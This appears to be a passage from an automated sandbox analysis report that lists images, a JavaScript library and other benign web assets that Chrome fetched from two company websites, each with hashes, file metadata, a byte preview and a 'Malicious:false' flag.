                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):16269
                                              Entropy (8bit):7.975366845092159
                                              Encrypted:false
                                              SSDEEP:384:K0wDqa5qxS5QogRdFlsQ/x0bLqg1iJlIs7P09i5IBR2:KJ5qseLdns6x0XqscX789F72
                                              MD5:4251B790E648A8BB811D309CEF12C5D3
                                              SHA1:45254C31E4864A91C46F36B4FBF7AFB5637F8582
                                              SHA-256:45A099032BEC4EA282CD5DABE430ACE0BE8D880606981D6FE1F822D0E851038E
                                              SHA-512:72697E87D85A7D01E631EE964C0954127EA55C6B5D512688256E4C15206BE75DCFA6FCF61A5F1E1A9D992AE3A4F4DBB34850B5E18CDCFE5E1F5C560DCEC4EC0F
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):10057
                                              Entropy (8bit):7.448299683190635
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwy4/niA6NqchjiHe5BLuhPZ6sHAJHiQSMT38:4YNg7y4/nitqchji+50hP0CAJH3lo
                                              MD5:700853572ED51D81A5132F5DC2754342
                                              SHA1:0B755538AB4563C2DBB75A2AB886602B00AD3545
                                              SHA-256:AC354E3D27A3E0A63BBB74D037351D9F7A9F5F88E23C88BF1404CFFC8B8F7BB3
                                              SHA-512:E4AFCCC68BB084B708027C0E83B3E64E635950FF989CE085E0D4FED8CC3370F2FA993785A48703815070980CE15AADBF8DCEA532B4ADFD9FC542E16EA7637C08
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/14/18df9dd19a42089a68e20614358518db.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):19116
                                              Entropy (8bit):7.98519406186033
                                              Encrypted:false
                                              SSDEEP:384:CU6nbNck+/tvJ9X4IdZQQyz6vcDeCHgnSRBGCqWfPsNH0KUzyMwxBuE4CXAi:Sb+V/r9X42aDDMgQTW5xWRBagr
                                              MD5:E228B8482EAEEFC07C401459DD583F9C
                                              SHA1:52371D07A8F38F4F472068AFC18848292D0B16AC
                                              SHA-256:8FBC4D4D835A4966D8D9444BC741B6E3CB72EB5B85C44128335A38B7B51F7FA8
                                              SHA-512:242D4F35F21DA7C0F9D2092F95278F63B244ABB439C6CF6E55C217FCE3B1D9EA4E6FD8AB9F5E2F64E49A7F5AD2955C17C10DD07C9DE94056AD8243C4061C4E35
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21413!3i14013!4i256!2m3!1e0!2sm!3i707457593!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=97929
                                              Preview:RIFF.J..WEBPVP8L.J../..?......s...8.;o.."[.$......U.>..{.DP.......+nc.V.'.]....h.....g...w......Q....&...!.z..(`....Z..H.fJ.M.....P.R....`.A......iz.A.dp.mD._.LT..oF.....O].a..oxoU.L ,@ (.A.5._n_j.kj......3m.zt.._.....h.Snl..L.....mP...a.p.H(...Z.......O.\..:Rje..#...vZv..a...aE....Lv..ZG.\".)*...}F.:|.s..l..D.eN....[.D.....}+..%k.......kfv.(....BX.a...3.Og........H7..M.....l.X.S..@....i#m.J*.........6.X6x.&.&.@6......H........z..{.8=.....*...y.'...e[..=.6..I.I.u?`.+..m'......J.U.%..J.}......i..@..r.p.S...j.W.i(.c.Z.....xk....L.z..SkF.Ln..Re..*...1B.).....G..%.}.u..(.F.4.......7Y...V...b.,scMw..w.U...v...R.....>P..3.=R.n....\..<...YL.l......a.v.....Tl.....%..i.......VJ.rs,...VE.`.*..S..%..&8..[..2r...~>.1.+..N.zD...]...T<...'...*.rx.[..sw...Q.'d.....hH9...Ze.Y.V..q..!q.W"]...8....}!......>@.zx..Z.}.c.0.T.P..6...pZ.*..m(.S.....T.\.L)...Z.2...Qk]n&..3d....vV......:/y_...,..7.)..3.....k.M.T....Y...[8Qj.m.3.*..2...`C...7L.l...U.BO.[........=..,..T^[
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 640x828, components 3
                                              Category:downloaded
                                              Size (bytes):47800
                                              Entropy (8bit):7.910679313587453
                                              Encrypted:false
                                              SSDEEP:768:yGf+jRiwqnQogtUk085N6PAkoclOtuioUwcua2XGyaycP3KJCxNmh:N2FvpOk75N6PJOtugX0Al3KYCh
                                              MD5:77041B9159C795ADFF777BF47A6D6228
                                              SHA1:52CC4FD99F8F9769C4EEB3422532795C877E85AC
                                              SHA-256:66F6A9CE68621C8742ACE08DCA556581DC91D439EB6A3ED5394C691D6AF0B714
                                              SHA-512:10CB2835D1B79CBAD54E16D7E0DC1D20C601CFF12DFAB26B5BE8D6EBA9E8ECBD983E68E12B9E20B8B12D6C777698CA3A226B67A05EE6C8EE1775BDA6F69D60D2
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/certifications/2/4e78ca5f7dd4e2d66f3b7d895ae18bd3.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:B50F5A53930B11ED8650888EB478A393" xmpMM:DocumentID="xmp.did:B50F5A54930B11ED8650888EB478A393"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B50F5A51930B11ED8650888EB478A393" stRef:documentID="xmp.did:B50F5A52930B11ED8650888EB478A393"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................'..'2&.&2.&&&&.>55555>DAAAAAADDDDDDDDDDDDDDDDDDDDDDDDDDDDD.... . &..&6& &6D6++6DDDB5BDDDDDDDDDDDDDDDDDDDDDDDD
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1500, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):82006
                                              Entropy (8bit):7.995535530001124
                                              Encrypted:true
                                              SSDEEP:1536:r7rvYNk9ublbCGWpqsyB1K44t2i5G60ExjmbeOI57p4x945ca:r7rrIlbCTqsS1K44txHqaB5tA92
                                              MD5:AC3D0E25CF2223C4024F5D6F09952E55
                                              SHA1:786E38481D3558F437D4B2D4688AFE310A59B22A
                                              SHA-256:73542C28880BB60439844274BA16843C05DC67D8D69647CA30C06150AD89D5AE
                                              SHA-512:18DC4BE2E6C06C8ABA85045CF668B0A0537195765F1A4968B1A71DA1FA11A2C5E23DD132A5DE44FE1BDD4794AC516F287CCEE93205D1350A1438ECBDE23A9E47
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/portfolio/malabar.webp
                                              Preview:RIFFN@..WEBPVP8 B@.......*....>Q(.F..!.!P..p..in.._S....9S?0....|......X...g..Y.w..y.;.c.....Or....mj)....G....y..g.y.......Op.....6~..V..E.B......t|C..............r.#.....C...o.?..........?..S.c...k.....s...]......_.....h.+..........g....7.....?{...........^|...}.k.!...7.o.?..r>.?........?...?....i.........[;....KK.!.].....u'WtC.:...I....N..RuwD:...!.].....u'W.N....^...-..RuwD:...!.]......^.z.....N..RuwD:...!.].....u9..!.].....u'WtC.:...I....N..RuwD:...!.].....u4^-..=R..G...iwD:...!.].....u'WtC.:...I....N..RuwD:...!.].....u'WtC.:...I....N..RuwD:...!.].....u.;..I....N..Rv? ...T....I....N..RuwD:...!.].....u'WtC.:...I....N..]..RuwD:...!.].....u'WtC.:...I....N..RuwD:...!.]....tC.|I9.....u'WtC.:...I....N..RuwD:...!.].....u'WtC.:...J.XZ......Z].....u'WtC.:...I....N..RuwD:...!.].....u'cjN..9x..tC.:...I....N..RuwD:.b".Tx.T....I....N..Ruv.........!.].....u'WtC.:...I....|.......KK.!.]......iixd...KK.!.].....u'WtC.:...I....N
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):29
                                              Entropy (8bit):4.142295219190901
                                              Encrypted:false
                                              SSDEEP:3:lZOwFQvn:lQw6n
                                              MD5:1FA71744DB23D0F8DF9CCE6719DEFCB7
                                              SHA1:E4BE9B7136697942A036F97CF26EBAF703AD2067
                                              SHA-256:EED0DC1FDB5D97ED188AE16FD5E1024A5BB744AF47340346BE2146300A6C54B9
                                              SHA-512:17FA262901B608368EB4B70910DA67E1F11B9CFB2C9DC81844F55BEE1DB3EC11F704D81AB20F2DDA973378F9C0DF56EAAD8111F34B92E4161A4D194BA902F82F
                                              Malicious:false
                                              Reputation:low
                                              Preview:window.google_ad_status = 1;.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2002
                                              Entropy (8bit):7.741215729148641
                                              Encrypted:false
                                              SSDEEP:48:a+dkJpd6JwO2KaCjY2MFgCzIp6aTqvSQmfrk8f9:mOJg27CzIQaTwSHfoW9
                                              MD5:64357859AAFB0BB359A3043EC7E6218D
                                              SHA1:66C8A7F5A8D3FE890DC056F8D56E07A573D7FB1D
                                              SHA-256:884C71ECA7049C730EF38540468D5543CB00993C1D23C3EB56F9FB808F0748B6
                                              SHA-512:0B2575A677D4BF6D80F84C6456DF6394149951F7F583CA7F0308F57424DD1D1BC70F06047245F75555BB785AE3712331B19F45CFE57F56285E3CE518D8CC00CB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/7.png
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...tIDATx.....S..O..Hn(.wy...C)e..)...HB.a.G.&1..(D/%I.H.1..*5..P.\..C.H.^.....l.......v.|?3....g......~.5...............................................H.C..@..p..I..2.I;....f...I.D..J......H.=.UB.......9isH].I.)..M.q.9.....b..!...........,.eiZ../.,D.9.r.......*.Eh.M...=J.^.!.@..P.).u..S.P.`.~.m<..S.....GD.M...v...UH_88....y]#=...F..Ny..|u.&.S..J.....i.C;.N.>.^.g....z.Gg{.....|...-OG..C..k.Qz}...-..(.k...}.t.a......^.v.W.....y].!.U....2.5..otH;...Q._F...}...O.a......uvx.9..r~\c..C...i...c.O..! ....$%.l-...z.q.....YH..e;...5I....c.r...XK.K~.#.xc%;.6/$M....d.8P...z..Z3H5.6...2M....r.IZ%..A.+.(9Z=.'.3....C...>..n..>.!....*u...".p.g~0.&I.m+;>.....R."q....d..0..C&3..Q.Y...rN..\_.......{..Q.tp.d:..l..:z...RfHTg...SrV.R.(b...5../7l.L....IO)e.......6..`..O.2...f9./...o...-Y:.y.~.....Uz.m)...b.....u..........H.).=l..b...,.f..0.,.x....{.7E.,.8...1S.T6.....GFa.L.....~....=.O..$.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:downloaded
                                              Size (bytes):62677
                                              Entropy (8bit):7.9706972729143395
                                              Encrypted:false
                                              SSDEEP:1536:kqHMKYYxDtUJv6diNTcYukL4fi85gjAbuDGpzUARD:kqHMKYkQv6YNTc04EEbuKhx
                                              MD5:65E847E389A33E68635095B712A7BFEF
                                              SHA1:451AC0DC83458839D3F11808C4CD9C444969C001
                                              SHA-256:5502EFD73532795349A6B33DA7E2D4C344649F1A8C9F7065389C91D9EF7A4B93
                                              SHA-512:8752DDFD0BF28C3169FAFA5BBDAB5298D2508BC67BFEB3A83DF57830B266F5A50500A6DA13BCD36B8366720C639FB6E412742F8328BB549DA8A547676209B1DD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/services/9/e453bc3c57f4421ad6cb5bc1be7d8d45.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:E451D927934411EDB6E1A8D9CFB88D1B" xmpMM:DocumentID="xmp.did:E451D928934411EDB6E1A8D9CFB88D1B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E451D925934411EDB6E1A8D9CFB88D1B" stRef:documentID="xmp.did:E451D926934411EDB6E1A8D9CFB88D1B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............>...................................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3292
                                              Entropy (8bit):7.924046214449455
                                              Encrypted:false
                                              SSDEEP:96:7snyqJuB95v0LSJ/KuD4GrXH2tXr2YM8WyvfhdqYbnY:7sny9TMm/LrS72f8PXhQYbnY
                                              MD5:098DE4EA903F025977AF94A898CDB243
                                              SHA1:89E3E03E97FDBBF7D4E1F09718714577AE374087
                                              SHA-256:C51331E69F6D481D3FD3162237376A56E4A1C130E0805834E36C584A8DC8CD4A
                                              SHA-512:F22CC7D6F54F134E4A90D58E42ABAD7C0E134B96180DF8828E4B13EBBC2E9812DD3B1ED133303DC60E90BB3B234BC774CEC49213DDBDAE92D9011A0FA0B899C1
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/google_api.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...wPLTE....C6.................XB.............T...B........>.......T........\....>/....F8L|.<.......^..V<.......JD...E:..d.........=.....F....M.F;......4..7|.....@0.....W....?4........Z.TH.........T......,...-.dc..K..|.....RO........_..Ay./.k....M....5.v........>@M.y...5s...o...............|k.u.2.G2.=-]...ol.ID....|...........L86.9lv....d~e...Rq....E>y....x.......mP.... IDATh..Xis.Z.......!..0`......././.w'....g.^&5ojf~..e...N..onTWT!.....E=.=.=.......q,...{v..Y..l."..c.n$...w=g......`..~...[.%..0...(2......Q.n{.....yz..D.....D.eY......z<dSSS..=......zs.m..T.|.1.....:...3.......z<...K..aY....B.-...Ht...V.~.k...d2..P.x...p....O{.o..I...J..8..../..X.)_Vw.e...b..Q(.1V?+...........B..9.a.PN.|..GD..J.H}[5.b..?.>.....U...eFF....L./..a.;.>.HX....i."...K.|4..c1..O..^.0.....JU..=%U>.....1..)......x.f...w$.|.\.....c$\.7...&/...y.....~....LH.7dnT.l..;.e..n.1G.b~`$..3.M.r..3.K|k.+.@...%K..5....a"...xa.!\.C..?S....,"..A..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):11592
                                              Entropy (8bit):7.549240307306143
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwxFfiMsnRLmfp4IZEhpU+KOaOYtaisXTXGHVKJy0uKW:4YNg77aMsnIOIWhPxa0la2NW
                                              MD5:8CBEAE8B44DA1455C7B97BC364B35924
                                              SHA1:B7513EC87C6609C3DF5EDBB8E21BBF287F3FC5E4
                                              SHA-256:0F4BCE5573CE95380FD72807623F246D990DE1920A8F9A30F4DB056BCB191382
                                              SHA-512:F3B590AABCBF580267FF9C05211CD6B91AFCC62F5C9B9CC2C8383C8AB6FDBDF6A4A8E8A756BC47E900509BC85FB840C1A31FD373D34A5DD49BE2E656B40E49C6
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/76/8ae6a32d4b5f5b8cf0fd304a24381aea.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):12951
                                              Entropy (8bit):7.630395591249626
                                              Encrypted:false
                                              SSDEEP:384:4YNg7WpabymqgItqk7wlmDZI7gwhGP7g5Ir87aUX:4YyYvmbItvTDO7+geua2
                                              MD5:28179E7CD97B863985C13D43F4CE42B2
                                              SHA1:FEB1428759776D9ECFFB58E869669444FF3BC108
                                              SHA-256:81D00A8BCEEC1B4F0ABD5F94077497C2DE8CFE86423EC53153E6EEF48B446BC4
                                              SHA-512:AD992EF15EE2365646F50CECF3A10E8BA92C6C8EC2FC0FCAF840522BEDC716E71CE391D066853A90E636A5AA13C394DDEBA977C26AE760F48AA9DC6377C9CA7F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/28/146c7a072447fd97cf1d236b37970e3a.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2391
                                              Entropy (8bit):7.8792374027186165
                                              Encrypted:false
                                              SSDEEP:48:XUVuLu6p8UVJP2Abuc17biBqq+oxjgdYVAapBBh5PDU1sWbUObCuz:XUQu6uCJOAbJ17biBj6yVrp7htDU1sWB
                                              MD5:397B13FD6DF6AEBCCF48D3F44B610257
                                              SHA1:4B52F76A3FB629B8861ADC925033B4B19E32096D
                                              SHA-256:877D58221494BBCB749C721BD28FC1BED5B01709FF50723C1CF36073B8FC9761
                                              SHA-512:51C1AB80FA5074A559E1F1C5FF492F74FEA81EB52BE802D960FEAA6C6D9B018737A451305885B6B568C35FA23E2A48D9365B58F6A78701F52E1F01C6366CBA0E
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...]PLTE.......@2....93.D8..........A4.;7.B9.B:....2.....64.........SJ.1)........up.VT.......GE.hg.+.9....IDATh..Z.r..D`Dd.........`.tk.W.......1.=.....././..9Hl...Z.1.F..].i..d......x<.&.kIl\.(.k.+[N......!0...!.~.2....M#.Q..u....8G1...@F..'.mj/t<n/..a;.._....1......=.F...`...".|...)B......lP*Lg..w.4...l....'.5..m.L...AK..(.F.{.j.!..~.q..,].....e.-.+mk..Y.}.._...G!._.c.7.mK..b..p.L.8`..a{.%..\..@<W]i}......J'.B...9...R..n...)+A....T.....g..FBueI.`.T.rh.#2F.V...`Kg. .p.mUiKr..KUl m....DV.&.P.*!V........0.q.3B.U.=..a..R..m-.Z, ...........+.%.'.a.1. .a.m..9.d..B.T.?*...s.z..u.{|....L....<..v...........P.....@5.U]W0.+.....R.].^7.O..R".I_.H.@B*.V.*....A.._{2V(.x.....3./y.[.... .;%.~......BA1#i.W....S......1\...P..b.;..).[*.o...@e.I.1._..z)..e]%*,.....u...R$..9I.....a..%..'..P.t.$a.3]G.$.....]..k*...C....25k..R.....!..&.0.IJ.A.4..o.a..2.....L...P...q.s0..<.=..n...........SH.B6..8..T&+..<..2\H....:p?L.Tb.b..e.7I>w.'..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):58040
                                              Entropy (8bit):7.996692211662229
                                              Encrypted:true
                                              SSDEEP:1536:6py/ASJLbTlToMR0H1fvyycDcS1NsyAFHMw4wVixrt+:PLbTW80xv4DcSzOsw4kIB+
                                              MD5:A6737A2676818047E2E6696895F5064F
                                              SHA1:89FC79F727BADB0FC7079B7E148210D99B94544E
                                              SHA-256:9D26A8D4866CAA5AD3B0712E33786AB4B81A6C9A944A3D3AA53BA54237B57F9D
                                              SHA-512:57F58DE0B068183B30EA15CC7A221DFA3EE3E8E6107369B2BF1CB427DC6D0ADC44FB1E010F5748552034A15E7588529B97812628E44BB37AFC888C2DE3D9C681
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/9/da3ea8845675faf87c497231993e7480.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 <........*....>.n.S)&3........en-.\_r.k...._...H.....vw..s....tv...lN...eC...|U.{.......>.^'......<....I.'.>...l.......O..w......~t.O.....+./.OE_...O....Lo_.*.......o.<'.....Y....w.......}....c..e.....w..........3.....o.?.|.~..?.w...._._........./..v$@..@=..[....i..C0-0..r.r..6E....?.........iH.p.M....T.r5..=,.{k.@..T.{..0(Y..rRw>.....F. .;.........12..y.u...T<P....Cl.........A........8..|....{$.Ut.{].......b....5...{.~U..u.]..S{.....cy.KW...3h....c5V.....g6..Nn....i..O4\.?.$.+X......&.#......u...dE....e\(........).~. H&+3.m........j.X._..l..s.?.%+.I....yiz3..CvE*.....k..n.C.&G.!.$I....+a.@*12.=.v..z.?.....'..'....r.2..T.m2...S.'l.Bi1..-Y...o...MOU..L.....A........H|.|..M..}.......Z.pM2e.6.;.y.H..}.U .<v.}H.!;.4"..i.U..r..P..P.w;.."5.[..Oc%.....n...D...Jv.c......2....);.....p..H....+.1EZ...........=.^.nDp....u..(..ik.....tT.....,"....D$t...c.7cd..Y.-7h...~ O.)......ok..L:..,l;7`.}....D...J.<..v.&j!=....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (32042)
                                              Category:downloaded
                                              Size (bytes):89031
                                              Entropy (8bit):5.101153363386029
                                              Encrypted:false
                                              SSDEEP:768:SH5U9RI5auoSDXMU43DCgryWTJRqlxC07Ekz+sbW4o/hPyUKOKYmm4vfX31ePROQ:+E6BfK8ONmmRPQdmYad9xD69umg
                                              MD5:BE4D6F4195222ADDAF474B45325E8DBC
                                              SHA1:D9520B1A05CCC172C424161F693FACA2B7CEAC54
                                              SHA-256:16750FD8712BF8B9EC03897561F94DDE9AD564848BC0AB36141ED7F7F7DD3C11
                                              SHA-512:9CA6432BECED2BA520FB607A0D9C7E42D81EC809A8F584E16686FC3B7C608EA870D8855074021315AB25FE3A9BC83C1C94C90B5C5399462CAD9D4AD793F3CCE8
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/mixitup.min.js
                                              Preview:/**!. * MixItUp v3.3.1. * A high-performance, dependency-free library for animated filtering, sorting and more. * Build 94e0fbf6-cd0b-4987-b3c0-14b59b67b8a0. *. * @copyright Copyright 2014-2018 KunkaLabs Limited.. * @author KunkaLabs Limited.. * @link https://www.kunkalabs.com/mixitup/. *. * @license Commercial use requires a commercial license.. * https://www.kunkalabs.com/mixitup/licenses/. *. * Non-commercial use permitted under same terms as CC BY-NC 3.0 license.. * http://creativecommons.org/licenses/by-nc/3.0/. */.!function(t){"use strict";var e=null,n=null;!function(){var e=["webkit","moz","o","ms"],n=t.document.createElement("div"),a=-1;for(a=0;a<e.length&&!t.requestAnimationFrame;a++)t.requestAnimationFrame=t[e[a]+"RequestAnimationFrame"];"undefined"==typeof n.nextElementSibling&&Object.defineProperty(t.Element.prototype,"nextElementSibling",{get:function(){for(var t=this.nextSibling;t;){if(1===t.nodeType)return t;t=t.nextSibling}retu
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5465
                                              Entropy (8bit):7.959560867675525
                                              Encrypted:false
                                              SSDEEP:96:ByUTcWHi7jbqByrvrucu959SFTuyPNPBeRQ7EQ7:ByogqUPucu95cFTuyPZBEG7
                                              MD5:40508BA2AE1FC521D1AE77983CAD08E8
                                              SHA1:208674A2D64CFC37358EEEEF5D69ADB5ABF9A345
                                              SHA-256:81677FC9510D96F16AE7DB99B430232F8C89C54DE01D8E7B6D8E42381E58A1AA
                                              SHA-512:252E5C420A0452318DE73F104A361D13923C5C6ABD89A064B11D94D9E687DA5B8D37837E300B0786C7ED7D848DADDC3D90D077A31CE9512E3CD1CC826D8A3D7E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/smo-seo.png
